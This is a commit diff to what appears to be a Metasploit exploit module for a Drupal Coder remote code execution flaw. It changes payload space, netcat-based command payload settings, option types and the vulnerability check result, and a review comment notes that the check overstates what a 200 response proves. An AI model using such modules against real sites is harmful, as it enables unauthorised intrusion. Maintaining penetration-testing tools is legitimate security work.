
Commit 780e83d

committed
Fix for Opt params and Space limits
1 parent 7e9c5f9 commit 780e83d


1 file changed

+9
-7
lines changed


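--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -37,11 +37,13 @@ def initialize(info={})
 'Privileged' => false,
 'Payload' =>
 {
-'BadChars' => "\x00\x2f",
-'Compat' =>
+'Space' => 225,
+'DisableNops' => true,
+'BadChars' => "\x00\x2f",
+'Compat' =>
 {
-'PayloadType' => 'cmd',
-'RequiredCmd' => 'netcat netcat-e'
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'netcat netcat-e'
 },
 },
 'Platform' => ['unix'],
@@ -54,8 +56,8 @@ def initialize(info={})
 register_options(
 [
 OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
-OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-OptString.new('SRVPORT', [true, 'Bogus web server port to listen'])
+OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
+OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
 ]
 )
 end
@@ -66,7 +68,7 @@ def check
 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
 )
 if res && res.code == 200
-Exploit::CheckCode::Vulnerable
+Exploit::CheckCode::Appears
 else
 Exploit::CheckCode::Safe
 end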
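Review bot: In `check`, the `res.code == 200` test only shows that the `coder_upgrade.run.php` path is served, so even the new `Exploit::CheckCode::Appears` claims more than the request establishes; a site that answers 200 for every path, or a corrected copy of the script, would presumably be reported the same way and produce a false positive in an audit. Since neither a version nor the response body is examined, `Exploit::CheckCode::Detected` looks like the closer fit, or at least a comment such as `# 200 only proves the script is reachable; the installed version is not verified` above the `if`. In the first hunk, `'Space' => 225` is a bare number and would benefit from a short comment naming where that limit comes from. `check` begins outside the hunk, so any validation done before the request is not visible here.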
